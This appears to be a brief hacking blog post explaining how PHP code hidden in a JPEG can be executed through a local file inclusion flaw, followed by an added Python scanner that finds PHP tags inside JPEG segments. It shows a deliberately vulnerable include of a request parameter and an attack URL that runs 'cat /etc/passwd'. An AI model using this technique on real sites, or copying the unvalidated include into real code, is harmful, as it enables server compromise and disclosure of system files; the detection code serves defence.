Bulletproof

 druide

What is special about this image?

It isn't beautiful, OK... anything else? No? Try this in a shell:

$ cat /path/to/image/1.jpg


And now? Oh, I can see a little PHP code in the image!? What is it, and how can it be used?




To use this image you must find a web site that includes a file like this:

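// some code

// Query parameter taken from the request and used as a path with no validation.
// The name matches the "page" parameter in the URL shown further down.
$page = $_GET["page"];
// include parses the target as PHP whatever its extension,
// so PHP code embedded in an image file is executed.
include $page;

// rest of the code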


Then all that remains is to use a URL like this:


http://localhost/test.php?page=1.jpg&c=cat%20/etc/passwd

Image source with related article : http://virtualabs.fr/Nasty-bulletproof-Jpegs-l
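
A defensive check for the trick described above, as an added example that is not part of the original post: it walks a JPEG's segments and reports where a PHP opening tag sits (comment segment, scan data, or bytes after the end-of-image marker). The function names and the SAMPLE bytes are constructed for illustration.

```python
import re
import struct

# PHP opening tags: include() executes whatever follows one, in any file type.
PHP_OPEN = re.compile(rb"<\?(php|=)", re.IGNORECASE)
NAMES = {0xE0: "APP0", 0xE1: "APP1", 0xFE: "COM", 0xDB: "DQT", 0xC4: "DHT", 0xDA: "SOS"}
# Bytes that may follow 0xFF inside entropy-coded data without ending it.
IN_SCAN = bytes([0x00, 0xFF]) + bytes(range(0xD0, 0xD8))

def jpeg_regions(data: bytes):
    """Yield (name, start, end) for marker segments, scan data and any trailer."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing JPEG SOI marker")
    pos = 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:  # EOI: anything after it is a trailer
            pos += 2
            break
        if pos + 4 > len(data):
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        end = min(pos + 2 + length, len(data))
        yield NAMES.get(marker, f"0x{marker:02X}"), pos, end
        if marker == 0xDA:  # entropy-coded data runs to the next real marker
            nxt = end
            while nxt + 1 < len(data) and (data[nxt] != 0xFF or data[nxt + 1] in IN_SCAN):
                nxt += 1
            if nxt + 1 >= len(data):
                nxt = len(data)
            yield "scan-data", end, nxt
            end = nxt
        pos = end
    if pos < len(data):  # bytes after EOI, or a remainder that could not be parsed
        yield "trailer", pos, len(data)

def find_php_tags(data: bytes):
    """Return [(region_name, absolute_offset)] for every PHP opening tag."""
    return [(name, m.start()) for name, start, end in jpeg_regions(data)
            for m in PHP_OPEN.finditer(data, start, end)]

def segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed sample: correct segment framing only, not a decodable picture.
SAMPLE = (b"\xff\xd8" + segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
          + segment(0xFE, b"<?php /* constructed marker */ ?>")
          + segment(0xDA, b"\x01\x01\x00\x00\x3f\x00") + b"\x12\xff\x00\x34\xff\xd9"
          + b"<?= 'constructed trailer' ?>")
```

A clean result from this scan does not make a request-supplied path safe to pass to include; the include itself should only ever receive a path chosen from a fixed list of known files.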

Tags: hacking image php

  • 8 years 4 months ago